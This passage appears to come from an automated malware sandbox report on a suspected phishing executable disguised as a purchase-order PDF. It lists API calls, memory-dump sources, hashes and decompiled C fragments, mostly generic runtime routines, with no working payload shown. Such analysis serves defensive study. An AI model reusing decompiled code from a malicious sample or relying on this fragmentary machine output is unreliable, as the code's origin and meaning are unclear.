                                                  					_t71 =  &(_t71[4]);
                                                  					goto L11;
                                                  				}
                                                  				asm("sbb eax, eax");
                                                  				E004018E0();
                                                  				_t71 = _t73;
                                                  				if(_t71 == 0) {
                                                  					goto L14;
                                                  				}
                                                  				 *_t71 = 0xcccc;
                                                  				goto L9;
                                                  			}

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                  • __alloca_probe_16.LIBCMT ref: 0040633D
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                  • __freea.LIBCMT ref: 004063A9
                                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00403E6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                                                  • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                  • Opcode Fuzzy Hash: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                                                  • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00AFA622
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: b7aa3a299cbe1475a8dbb97881b1e6858afaf7b88173049d76471e964fbca0e1
                                                  • Instruction ID: b590f6d8b112805e754d96b17d431bcd23d272f3ce6d59453871d7ce70413d28
                                                  • Opcode Fuzzy Hash: b7aa3a299cbe1475a8dbb97881b1e6858afaf7b88173049d76471e964fbca0e1
                                                  • Instruction Fuzzy Hash: FA11E2B250410CABDF217BF1CD05ABE7BE8EF99360F150019F709D7101EA75880196A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AFC866
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AFC88C
                                                  • _free.LIBCMT ref: 00AFC8CC
                                                  • _free.LIBCMT ref: 00AFC8FF
                                                  • SetLastError.KERNEL32(00000000), ref: 00AFC90C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 743adef797e81e1c1aedd5502bfff3f54cab558878b0dd029a3c7d38d95226a7
                                                  • Instruction ID: b2f2d5c3a12904f32c0bac5c35e0482750c27bc28b9c8a98e9e7865be0cbba59
                                                  • Opcode Fuzzy Hash: 743adef797e81e1c1aedd5502bfff3f54cab558878b0dd029a3c7d38d95226a7
                                                  • Instruction Fuzzy Hash: C211A17291060DB6CA2127FAAF85D3B36A9AFC4BB47250234F715E31E1DF28CD1241A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00B0C595: __dosmaperr.LIBCMT ref: 00B0C5F5
                                                    • Part of subcall function 00B0C595: _free.LIBCMT ref: 00B0C664
                                                  • _free.LIBCMT ref: 00B0D04E
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B0D070
                                                  • _free.LIBCMT ref: 00B0D078
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2121076959-0
                                                  • Opcode ID: 168a1695bb66eb4f00bc486af1900090672f166645ccaa01624ef7fb8a708746
                                                  • Instruction ID: c7fc5a9e88def1f84474a1fecc2a0e8476ef6c6fd8ca383a8b77e0de8d20ddae
                                                  • Opcode Fuzzy Hash: 168a1695bb66eb4f00bc486af1900090672f166645ccaa01624ef7fb8a708746
                                                  • Instruction Fuzzy Hash: 47019271905218BBDF21AFE4DD429AEBFB8EF49330B200295FD14A21D0EF319E119650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00B042E0
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B042F2
                                                  • _free.LIBCMT ref: 00B04304
                                                  • _free.LIBCMT ref: 00B04316
                                                  • _free.LIBCMT ref: 00B04328
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9437e22b3a9d74f85ce991df19d2ed006275e098a3b9d78c9a8dc793ea28c819
                                                  • Instruction ID: 2bab6f82ed95cddf951b7673e156d2ab0bf727dcacc35d6c3c85e5eac9f4eed8
                                                  • Opcode Fuzzy Hash: 9437e22b3a9d74f85ce991df19d2ed006275e098a3b9d78c9a8dc793ea28c819
                                                  • Instruction Fuzzy Hash: EEF096B2504208E7CA30FB99F682D1B7BD9EA487103545846F308DB551CF34FC808654
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                  • API String ID: 0-2307794731
                                                  • Opcode ID: edf885e57e6e6e23a9ab8c24e9726bc48084b34246acca2ab136bfcbcbde25b6
                                                  • Instruction ID: 103433e62b3261d8fe782d26879363e41eebd25cd95121b30aa960e77b458b04
                                                  • Opcode Fuzzy Hash: edf885e57e6e6e23a9ab8c24e9726bc48084b34246acca2ab136bfcbcbde25b6
                                                  • Instruction Fuzzy Hash: 1D417F71A4121CEBDB21EBD9DD819BEBBB8EF89350B10406AF60597250EB718A41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00B0CC01
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                  • String ID:
                                                  • API String ID: 2667617558-0
                                                  • Opcode ID: 9620b1184beb738bad4d28ed1740639fa095657effaffa23e65cb2bffc0508df
                                                  • Instruction ID: e18ca9f11e6b329f1c03b364773544bb29c24dcf25aa140ad3c1a2a9bf758521
                                                  • Opcode Fuzzy Hash: 9620b1184beb738bad4d28ed1740639fa095657effaffa23e65cb2bffc0508df
                                                  • Instruction Fuzzy Hash: EDB18F71E002099BDF24DFA8D882AEEBFF5EF48710F1445AAE905EB291E7319D41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 321ce769e20ef609b5a88819d1b3fb84aacb39e9b4efd1d9210f5460c0bed61d
                                                  • Instruction ID: 0d3bf0a55512691f655575ad01bc9975a0493e168b3b8ba3aaf1ac224e894ea4
                                                  • Opcode Fuzzy Hash: 321ce769e20ef609b5a88819d1b3fb84aacb39e9b4efd1d9210f5460c0bed61d
                                                  • Instruction Fuzzy Hash: 70B1357190028E9FDB25CF9ACA817BEBFB5FF45360F2441A9F6489B241D2349D42C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f2b4ffe87d98428a0b6e9e2e3d4f7bcd7205434dada3fc9d47559bb86e6e08d8
                                                  • Instruction ID: e84608b7d8a9d18b4fa631054f80d4af7abba39a1a358db786f247209db2935c
                                                  • Opcode Fuzzy Hash: f2b4ffe87d98428a0b6e9e2e3d4f7bcd7205434dada3fc9d47559bb86e6e08d8
                                                  • Instruction Fuzzy Hash: 0A412831A101046BDB217AF8CC86BFE3AE4EF55370F544295F518D62D1DAF49DC18BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e62c31024ab95bbf6dec53800847912944b3d843130900ef92a637541dbbbc5
                                                  • Instruction ID: e60e9d97c20b2ea79dc71155ae725a472cfdf17bd0db23433c78c9e85203aadd
                                                  • Opcode Fuzzy Hash: 0e62c31024ab95bbf6dec53800847912944b3d843130900ef92a637541dbbbc5
                                                  • Instruction Fuzzy Hash: D641E7B1A00208BFD7259E78C845BAEBFE8EB49710F104AAEF165DB3C1D671E9408790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 4562fb9152cb879671b22aba573d1a369d6e82d42e60f65bf1c7fa6f03928aa6
                                                  • Instruction ID: 1a28384d476708be8558e1a346e3a50e4ae861f45137c06e67fa209fc5f3d466
                                                  • Opcode Fuzzy Hash: 4562fb9152cb879671b22aba573d1a369d6e82d42e60f65bf1c7fa6f03928aa6
                                                  • Instruction Fuzzy Hash: 2201D63290861D76DA6127FA9F85D3B326AAFC57B43252614F715D31E1DF24CC124121
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d7f33d474bad9e5476e4d801c78574c86f8afd19be0ee1012cf6d55000f9374
                                                  • Instruction ID: 7b779e83cd0d50540044a06fe0a7a897af1d0d8bf33b9c508e9871325bb4daef
                                                  • Opcode Fuzzy Hash: 4d7f33d474bad9e5476e4d801c78574c86f8afd19be0ee1012cf6d55000f9374
                                                  • Instruction Fuzzy Hash: D901F2B220921D7EFA212AB86CC0F77664CEB817B5B314335F731A21C0DFA48C004260
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a322ef4e0312289e3f82fc7730378f2029b70c1c9e41be201ddc98e9cdb72e7a
                                                  • Instruction ID: 936bf53f0e185e4e773515d25490c8c5926ed0e286179a48af5a6e7bd4a7b3df
                                                  • Opcode Fuzzy Hash: a322ef4e0312289e3f82fc7730378f2029b70c1c9e41be201ddc98e9cdb72e7a
                                                  • Instruction Fuzzy Hash: 9B0162B250961E7ABA2127F86CC4E77665CEB957753318325F721521D1DFA48C104264
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00405751(signed int _a4) {
                                                  				signed int _t9;
                                                  				void* _t13;
                                                  				signed int _t15;
                                                  				WCHAR* _t22;
                                                  				signed int _t24;
                                                  				signed int* _t25;
                                                  				void* _t27;
                                                  
                                                  				_t9 = _a4;
                                                  				_t25 = 0x412fc8 + _t9 * 4;
                                                  				_t24 =  *_t25;
                                                  				if(_t24 == 0) {
                                                  					_t22 =  *(0x40cd48 + _t9 * 4);
                                                  					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                  					if(_t27 != 0) {
                                                  						L8:
                                                  						 *_t25 = _t27;
                                                  						if( *_t25 != 0) {
                                                  							FreeLibrary(_t27);
                                                  						}
                                                  						_t13 = _t27;
                                                  						L11:
                                                  						return _t13;
                                                  					}
                                                  					_t15 = GetLastError();
                                                  					if(_t15 != 0x57) {
                                                  						_t27 = 0;
                                                  					} else {
                                                  						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                  						_t27 = _t15;
                                                  					}
                                                  					if(_t27 != 0) {
                                                  						goto L8;
                                                  					} else {
                                                  						 *_t25 = _t15 | 0xffffffff;
                                                  						_t13 = 0;
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				_t4 = _t24 + 1; // 0x9e6834ec
                                                  				asm("sbb eax, eax");
                                                  				return  ~_t4 & _t24;
                                                  			}


                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                  • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                  • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                  • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                  • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t2;
                                                  				void* _t3;
                                                  				void* _t4;
                                                  				intOrPtr _t9;
                                                  				void* _t11;
                                                  				void* _t20;
                                                  				void* _t21;
                                                  				void* _t23;
                                                  				void* _t25;
                                                  				void* _t27;
                                                  				void* _t29;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				long _t36;
                                                  				long _t37;
                                                  				void* _t40;
                                                  
                                                  				_t29 = __edx;
                                                  				_t23 = __ecx;
                                                  				_t20 = __ebx;
                                                  				_t36 = GetLastError();
                                                  				_t2 =  *0x412064; // 0x9
                                                  				_t42 = _t2 - 0xffffffff;
                                                  				if(_t2 == 0xffffffff) {
                                                  					L2:
                                                  					_t3 = E00403ECE(_t23, 1, 0x364);
                                                  					_t31 = _t3;
                                                  					_pop(_t25);
                                                  					if(_t31 != 0) {
                                                  						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                                  						__eflags = _t4;
                                                  						if(_t4 != 0) {
                                                  							E00404192(_t25, _t31, 0x4132a4);
                                                  							E00403E03(0);
                                                  							_t40 = _t40 + 0xc;
                                                  							__eflags = _t31;
                                                  							if(_t31 == 0) {
                                                  								goto L9;
                                                  							} else {
                                                  								goto L8;
                                                  							}
                                                  						} else {
                                                  							_push(_t31);
                                                  							goto L4;
                                                  						}
                                                  					} else {
                                                  						_push(_t3);
                                                  						L4:
                                                  						E00403E03();
                                                  						_pop(_t25);
                                                  						L9:
                                                  						SetLastError(_t36);
                                                  						E00403E8B(_t20, _t29, _t31, _t36);
                                                  						asm("int3");
                                                  						_push(_t20);
                                                  						_push(_t36);
                                                  						_push(_t31);
                                                  						_t37 = GetLastError();
                                                  						_t21 = 0;
                                                  						_t9 =  *0x412064; // 0x9
                                                  						_t45 = _t9 - 0xffffffff;
                                                  						if(_t9 == 0xffffffff) {
                                                  							L12:
                                                  							_t32 = E00403ECE(_t25, 1, 0x364);
                                                  							_pop(_t27);
                                                  							if(_t32 != 0) {
                                                  								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                                  								__eflags = _t11;
                                                  								if(_t11 != 0) {
                                                  									E00404192(_t27, _t32, 0x4132a4);
                                                  									E00403E03(_t21);
                                                  									__eflags = _t32;
                                                  									if(_t32 != 0) {
                                                  										goto L19;
                                                  									} else {
                                                  										goto L18;
                                                  									}
                                                  								} else {
                                                  									_push(_t32);
                                                  									goto L14;
                                                  								}
                                                  							} else {
                                                  								_push(_t21);
                                                  								L14:
                                                  								E00403E03();
                                                  								L18:
                                                  								SetLastError(_t37);
                                                  							}
                                                  						} else {
                                                  							_t32 = E00405878(_t25, _t45, _t9);
                                                  							if(_t32 != 0) {
                                                  								L19:
                                                  								SetLastError(_t37);
                                                  								_t21 = _t32;
                                                  							} else {
                                                  								goto L12;
                                                  							}
                                                  						}
                                                  						return _t21;
                                                  					}
                                                  				} else {
                                                  					_t31 = E00405878(_t23, _t42, _t2);
                                                  					if(_t31 != 0) {
                                                  						L8:
                                                  						SetLastError(_t36);
                                                  						return _t31;
                                                  					} else {
                                                  						goto L2;
                                                  					}
                                                  				}
                                                  			}


                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                  • _abort.LIBCMT ref: 0040439E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_abort
                                                  • String ID:
                                                  • API String ID: 88804580-0
                                                  • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                                                  • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                  • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                                                  • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00B102C4
                                                  • GetLastError.KERNEL32 ref: 00B102D0
                                                    • Part of subcall function 00B10379: CloseHandle.KERNEL32(FFFFFFFE,00B103C3,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000), ref: 00B10389
                                                  • ___initconout.LIBCMT ref: 00B102E0
                                                    • Part of subcall function 00B1033B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B1036A,00B07EED,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B1034E
                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00B102F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: f72df9fce16527bf523ead18512c16834974a5c737a48b6c13ac2daff2d284d0
                                                  • Instruction ID: c066a37f156aef2edd0ca28217165c1b3dd90e842034002412ef5c7d0dab47bb
                                                  • Opcode Fuzzy Hash: f72df9fce16527bf523ead18512c16834974a5c737a48b6c13ac2daff2d284d0
                                                  • Instruction Fuzzy Hash: E3F05E36101104ABCB222B96EC08D867FB6EFCD7507614855F699C3130CF7198E09B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadConsoleW.KERNEL32(?,?,?,00000000), ref: 00B07913
                                                  • GetLastError.KERNEL32 ref: 00B0791F
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B0792F
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleW.KERNEL32(?,?,?,00000000), ref: 00B07943
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1921647122-0
                                                  • Opcode ID: ea4b04902a998651114e3f31058d8dcfdbc50c219d3d997ec29615825e774489
                                                  • Instruction ID: 343807a787a4c209d2dfb1d7443361571770c86b5cfe7076256dab0f52797106
                                                  • Opcode Fuzzy Hash: ea4b04902a998651114e3f31058d8dcfdbc50c219d3d997ec29615825e774489
                                                  • Instruction Fuzzy Hash: 82F08236140104BBCB222F96DC05D46BFF7EFC83207264459F54993170DF31E8619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadConsoleInputA.KERNEL32(?,?,?), ref: 00B079FB
                                                  • GetLastError.KERNEL32 ref: 00B07A07
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07A17
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleInputA.KERNEL32(?,?,?), ref: 00B07A2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
